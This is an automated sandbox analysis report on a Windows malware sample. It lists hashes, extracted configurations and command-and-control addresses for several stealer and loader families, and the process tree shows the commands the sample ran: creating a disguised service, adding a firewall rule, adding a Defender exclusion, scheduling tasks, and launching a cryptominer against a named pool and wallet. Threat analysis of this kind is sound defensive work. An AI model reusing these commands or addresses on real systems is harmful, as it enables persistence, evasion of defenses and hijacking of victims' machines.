Analysis
-
max time kernel
44s -
max time network
201s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
13-10-2021 17:03
Static task
static1
Behavioral task
behavioral1
Sample
21fbb712aab6d4e991d123a1e9c0cedf.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
21fbb712aab6d4e991d123a1e9c0cedf.exe
Resource
win10-en-20210920
General
-
Target
21fbb712aab6d4e991d123a1e9c0cedf.exe
-
Size
311KB
-
MD5
21fbb712aab6d4e991d123a1e9c0cedf
-
SHA1
127cba0dbc74422e00f431f42a2713cf108b9cb4
-
SHA256
d3184ceae376a789ccd61e767da3f21cacd72dfc7162a5e1a9569c7244d0bf9a
-
SHA512
dca4b74ec7107d982829a9a697570ffef8b4eb7e59b2fe9139ab5a4f655062f421fc6897d99ffc2275e15d3c4ab7f61bfb9ecc9a3485a440c0d0fd86e22f57ce
Malware Config
Extracted
smokeloader
2020
http://honawey7.xyz/
http://wijibui0.xyz/
http://hefahei6.xyz/
http://pipevai4.xyz/
http://nalirou7.xyz/
http://xacokuo8.xyz/
http://hajezey1.xyz/
http://gejajoo7.xyz/
http://sysaheu9.xyz/
http://rixoxeu9.xyz/
Extracted
tofsee
quadoil.ru
lakeflex.ru
Extracted
vidar
41.3
1033
https://mas.to/@oleg98
-
profile_id
1033
Extracted
raccoon
1.8.2
fbe5e97e7d069407605ee9138022aa82166657e6
-
url4cnc
http://telemirror.top/stevuitreen
http://tgmirror.top/stevuitreen
http://telegatt.top/stevuitreen
http://telegka.top/stevuitreen
http://telegin.top/stevuitreen
https://t.me/stevuitreen
Extracted
redline
w1
109.234.34.165:12323
Extracted
redline
MegaProliv2
93.115.20.139:28978
Extracted
raccoon
7ebf9b416b72a203df65383eec899dc689d2c3d7
-
url4cnc
http://telegatt.top/agrybirdsgamerept
http://telegka.top/agrybirdsgamerept
http://telegin.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
redline
@Nastya_ero
45.14.49.66:21899
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 11 IoCs
resource yara_rule behavioral1/memory/1508-113-0x0000000000360000-0x0000000000391000-memory.dmp family_redline behavioral1/memory/1508-118-0x00000000006F0000-0x000000000070C000-memory.dmp family_redline behavioral1/memory/1476-154-0x0000000000390000-0x00000000003C1000-memory.dmp family_redline behavioral1/memory/1608-163-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/1608-166-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/1608-167-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/1608-169-0x000000000041B252-mapping.dmp family_redline behavioral1/memory/1608-172-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2076-202-0x00000000004E0000-0x00000000004FC000-memory.dmp family_redline behavioral1/memory/2932-276-0x000000000041B256-mapping.dmp family_redline behavioral1/memory/2248-337-0x000000000041B22A-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral1/memory/484-327-0x0000000000400000-0x000000000071C000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 7 IoCs
resource yara_rule behavioral1/files/0x000400000001312d-233.dat Nirsoft behavioral1/files/0x000400000001312d-234.dat Nirsoft behavioral1/files/0x000400000001312d-236.dat Nirsoft behavioral1/files/0x000400000001312d-239.dat Nirsoft behavioral1/files/0x000400000001312d-240.dat Nirsoft behavioral1/files/0x000400000001312d-241.dat Nirsoft behavioral1/files/0x000400000001312d-243.dat Nirsoft -
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/904-108-0x00000000002A0000-0x0000000000376000-memory.dmp family_vidar behavioral1/memory/904-109-0x0000000000400000-0x0000000001735000-memory.dmp family_vidar -
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral1/memory/424-150-0x0000000000260000-0x0000000000351000-memory.dmp xmrig behavioral1/memory/424-157-0x00000000002F259C-mapping.dmp xmrig -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 1428 7FE9.exe 524 7FE9.exe 1652 8A08.exe 1712 8E9B.exe 2036 9466.exe 904 9792.exe 1708 jcqcuoqd.exe 1508 A24D.exe 1136 B66A.exe 1088 BCE0.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000500000001310a-198.dat vmprotect behavioral1/memory/2276-201-0x0000000000040000-0x00000000006D9000-memory.dmp vmprotect behavioral1/files/0x000500000001310a-205.dat vmprotect behavioral1/files/0x0003000000013116-216.dat vmprotect behavioral1/files/0x0003000000013116-218.dat vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8E9B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8E9B.exe -
Deletes itself 1 IoCs
pid Process 1196 Process not Found -
Loads dropped DLL 2 IoCs
pid Process 1428 7FE9.exe 1088 BCE0.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 2316 icacls.exe 3068 icacls.exe 2200 icacls.exe -
resource yara_rule behavioral1/files/0x00040000000130db-78.dat themida behavioral1/memory/1712-86-0x0000000000890000-0x0000000000891000-memory.dmp themida behavioral1/files/0x0003000000013133-251.dat themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8E9B.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1712 8E9B.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1984 set thread context of 1096 1984 21fbb712aab6d4e991d123a1e9c0cedf.exe 27 PID 1428 set thread context of 524 1428 7FE9.exe 29 PID 1708 set thread context of 792 1708 jcqcuoqd.exe 50 -
autoit_exe 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/1892-338-0x00000000013E0000-0x00000000017E9000-memory.dmp autoit_exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 2160 1584 WerFault.exe 56 2236 904 WerFault.exe 38 1492 2404 WerFault.exe 65 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 21fbb712aab6d4e991d123a1e9c0cedf.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 21fbb712aab6d4e991d123a1e9c0cedf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7FE9.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7FE9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7FE9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 21fbb712aab6d4e991d123a1e9c0cedf.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2664 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2608 timeout.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = e43b193d4dc3750424edb47d450dd49d084297dce82e72baa48217fde07d771df0e8677181cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814da8d4f7539e3aa644490bdb57821e8925d00cffdbf54758df21d5904e0ac6c15d481447438ed9d084295d9e13f4bb4c06d03fdadfd5430d59e470f30fca06c16d5b40e367b8be90d4091bdb57526ed975905c4f6ba54718bce15515bb9fd3041ed8548743aedaf5519cc8c84a934d4a4243a1c9d8d541de4ac743d04bafb2f4fb2c70f320dd49d642df4bd84e52059f72834fdc48d57d1f6ae743d04cce5284589db142823a6e8642df4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743d04cd745c24ed svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1096 21fbb712aab6d4e991d123a1e9c0cedf.exe 1096 21fbb712aab6d4e991d123a1e9c0cedf.exe 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found 1196 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1096 21fbb712aab6d4e991d123a1e9c0cedf.exe 524 7FE9.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeShutdownPrivilege 1196 Process not Found Token: SeShutdownPrivilege 1196 Process not Found Token: SeDebugPrivilege 1712 8E9B.exe Token: SeShutdownPrivilege 1196 Process not Found Token: SeDebugPrivilege 1508 A24D.exe Token: SeShutdownPrivilege 1196 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1984 wrote to memory of 1096 1984 21fbb712aab6d4e991d123a1e9c0cedf.exe 27 PID 1984 wrote to memory of 1096 1984 21fbb712aab6d4e991d123a1e9c0cedf.exe 27 PID 1984 wrote to memory of 1096 1984 21fbb712aab6d4e991d123a1e9c0cedf.exe 27 PID 1984 wrote to memory of 1096 1984 21fbb712aab6d4e991d123a1e9c0cedf.exe 27 PID 1984 wrote to memory of 1096 1984 21fbb712aab6d4e991d123a1e9c0cedf.exe 27 PID 1984 wrote to memory of 1096 1984 21fbb712aab6d4e991d123a1e9c0cedf.exe 27 PID 1984 wrote to memory of 1096 1984 21fbb712aab6d4e991d123a1e9c0cedf.exe 27 PID 1196 wrote to memory of 1428 1196 Process not Found 28 PID 1196 wrote to memory of 1428 1196 Process not Found 28 PID 1196 wrote to memory of 1428 1196 Process not Found 28 PID 1196 wrote to memory of 1428 1196 Process not Found 28 PID 1428 wrote to memory of 524 1428 7FE9.exe 29 PID 1428 wrote to memory of 524 1428 7FE9.exe 29 PID 1428 wrote to memory of 524 1428 7FE9.exe 29 PID 1428 wrote to memory of 524 1428 7FE9.exe 29 PID 1428 wrote to memory of 524 1428 7FE9.exe 29 PID 1428 wrote to memory of 524 1428 7FE9.exe 29 PID 1428 wrote to memory of 524 1428 7FE9.exe 29 PID 1196 wrote to memory of 1652 1196 Process not Found 30 PID 1196 wrote to memory of 1652 1196 Process not Found 30 PID 1196 wrote to memory of 1652 1196 Process not Found 30 PID 1196 wrote to memory of 1652 1196 Process not Found 30 PID 1196 wrote to memory of 1712 1196 Process not Found 31 PID 1196 wrote to memory of 1712 1196 Process not Found 31 PID 1196 wrote to memory of 1712 1196 Process not Found 31 PID 1196 wrote to memory of 1712 1196 Process not Found 31 PID 1652 wrote to memory of 624 1652 8A08.exe 33 PID 1652 wrote to memory of 624 1652 8A08.exe 33 PID 1652 wrote to memory of 624 1652 8A08.exe 33 PID 1652 wrote to memory of 624 1652 8A08.exe 33 PID 1196 wrote to memory of 2036 1196 Process not Found 35 PID 1196 wrote to memory of 2036 1196 Process not Found 35 PID 1196 wrote to memory of 2036 1196 Process not Found 35 PID 1196 wrote to memory of 2036 1196 Process not Found 35 PID 1652 wrote to memory of 992 1652 8A08.exe 36 PID 1652 wrote to memory of 992 1652 8A08.exe 36 PID 1652 wrote to memory of 992 1652 8A08.exe 36 PID 1652 wrote to memory of 992 1652 8A08.exe 36 PID 1196 wrote to memory of 904 1196 Process not Found 38 PID 1196 wrote to memory of 904 1196 Process not Found 38 PID 1196 wrote to memory of 904 1196 Process not Found 38 PID 1196 wrote to memory of 904 1196 Process not Found 38 PID 1652 wrote to memory of 1720 1652 8A08.exe 39 PID 1652 wrote to memory of 1720 1652 8A08.exe 39 PID 1652 wrote to memory of 1720 1652 8A08.exe 39 PID 1652 wrote to memory of 1720 1652 8A08.exe 39 PID 1652 wrote to memory of 1504 1652 8A08.exe 41 PID 1652 wrote to memory of 1504 1652 8A08.exe 41 PID 1652 wrote to memory of 1504 1652 8A08.exe 41 PID 1652 wrote to memory of 1504 1652 8A08.exe 41 PID 1652 wrote to memory of 1360 1652 8A08.exe 43 PID 1652 wrote to memory of 1360 1652 8A08.exe 43 PID 1652 wrote to memory of 1360 1652 8A08.exe 43 PID 1652 wrote to memory of 1360 1652 8A08.exe 43 PID 1652 wrote to memory of 1852 1652 8A08.exe 46 PID 1652 wrote to memory of 1852 1652 8A08.exe 46 PID 1652 wrote to memory of 1852 1652 8A08.exe 46 PID 1652 wrote to memory of 1852 1652 8A08.exe 46 PID 1196 wrote to memory of 1508 1196 Process not Found 47 PID 1196 wrote to memory of 1508 1196 Process not Found 47 PID 1196 wrote to memory of 1508 1196 Process not Found 47 PID 1196 wrote to memory of 1508 1196 Process not Found 47 PID 1708 wrote to memory of 792 1708 jcqcuoqd.exe 50 PID 1708 wrote to memory of 792 1708 jcqcuoqd.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"C:\Users\Admin\AppData\Local\Temp\21fbb712aab6d4e991d123a1e9c0cedf.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1096
-
-
C:\Users\Admin\AppData\Local\Temp\7FE9.exeC:\Users\Admin\AppData\Local\Temp\7FE9.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Users\Admin\AppData\Local\Temp\7FE9.exeC:\Users\Admin\AppData\Local\Temp\7FE9.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:524
-
-
C:\Users\Admin\AppData\Local\Temp\8A08.exeC:\Users\Admin\AppData\Local\Temp\8A08.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ydeernnp\2⤵PID:624
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jcqcuoqd.exe" C:\Windows\SysWOW64\ydeernnp\2⤵PID:992
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ydeernnp binPath= "C:\Windows\SysWOW64\ydeernnp\jcqcuoqd.exe /d\"C:\Users\Admin\AppData\Local\Temp\8A08.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:1720
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ydeernnp "wifi internet conection"2⤵PID:1504
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ydeernnp2⤵PID:1360
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\8E9B.exeC:\Users\Admin\AppData\Local\Temp\8E9B.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
C:\Users\Admin\AppData\Local\Temp\9466.exeC:\Users\Admin\AppData\Local\Temp\9466.exe1⤵
- Executes dropped EXE
PID:2036
-
C:\Users\Admin\AppData\Local\Temp\9792.exeC:\Users\Admin\AppData\Local\Temp\9792.exe1⤵
- Executes dropped EXE
PID:904 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 8682⤵
- Program crash
PID:2236
-
-
C:\Windows\SysWOW64\ydeernnp\jcqcuoqd.exeC:\Windows\SysWOW64\ydeernnp\jcqcuoqd.exe /d"C:\Users\Admin\AppData\Local\Temp\8A08.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:792 -
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:424
-
-
-
C:\Users\Admin\AppData\Local\Temp\A24D.exeC:\Users\Admin\AppData\Local\Temp\A24D.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
C:\Users\Admin\AppData\Local\Temp\B66A.exeC:\Users\Admin\AppData\Local\Temp\B66A.exe1⤵
- Executes dropped EXE
PID:1136
-
C:\Users\Admin\AppData\Local\Temp\BCE0.exeC:\Users\Admin\AppData\Local\Temp\BCE0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\BCE0.exeC:\Users\Admin\AppData\Local\Temp\BCE0.exe2⤵PID:1608
-
-
C:\Users\Admin\AppData\Local\Temp\C6B1.exeC:\Users\Admin\AppData\Local\Temp\C6B1.exe1⤵PID:1584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 4402⤵
- Program crash
PID:2160
-
-
C:\Users\Admin\AppData\Local\Temp\C99F.exeC:\Users\Admin\AppData\Local\Temp\C99F.exe1⤵PID:1476
-
C:\Users\Admin\AppData\Local\Temp\D302.exeC:\Users\Admin\AppData\Local\Temp\D302.exe1⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\E2AC.exeC:\Users\Admin\AppData\Local\Temp\E2AC.exe1⤵PID:2276
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"2⤵PID:2512
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\3⤵PID:2628
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵PID:2704
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F3⤵
- Creates scheduled task(s)
PID:2664
-
-
C:\ProgramData\2103609787\2103609787.exe"C:\ProgramData\2103609787.\2103609787.exe"3⤵PID:2644
-
-
-
C:\Users\Admin\AppData\Local\Temp\F1CA.exeC:\Users\Admin\AppData\Local\Temp\F1CA.exe1⤵PID:2404
-
C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\032fd786-c2a2-4232-9b67-8d5e65a989af\AdvancedRun.exe" /SpecialRun 4101d8 28083⤵PID:2920
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\F1CA.exe" -Force2⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\F1CA.exe"C:\Users\Admin\AppData\Local\Temp\F1CA.exe"2⤵PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\F1CA.exe"C:\Users\Admin\AppData\Local\Temp\F1CA.exe"2⤵PID:2248
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 17842⤵
- Program crash
PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\AA.exeC:\Users\Admin\AppData\Local\Temp\AA.exe1⤵PID:2608
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\207A.exeC:\Users\Admin\AppData\Local\Temp\207A.exe1⤵PID:2976
-
C:\Users\Admin\AppData\Local\Temp\1_1.exe"C:\Users\Admin\AppData\Local\Temp\1_1.exe"2⤵PID:3024
-
-
C:\Users\Admin\AppData\Local\Temp\ins.exe"C:\Users\Admin\AppData\Local\Temp\ins.exe"2⤵PID:484
-
C:\ProgramData\update.exe"C:\ProgramData\update.exe"3⤵PID:1892
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "Admin:(R,REA,RA,RD)"4⤵PID:2852
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"5⤵
- Modifies file permissions
PID:3068
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"5⤵
- Modifies file permissions
PID:2200
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\amd64_microsoft-windows-n..tshellext.resources_31bf3856ad364e35_6.1.7600.16385_ru-ru_fc7d659df7099021" /inheritance:e /deny "Admin:(R,REA,RA,RD)"5⤵
- Modifies file permissions
PID:2316
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ins.exe" & exit3⤵PID:2244
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
PID:2608
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E510D8CC-019E-4335-A47E-1054117D25F5} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:2152
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Modify Registry
1Virtualization/Sandbox Evasion
1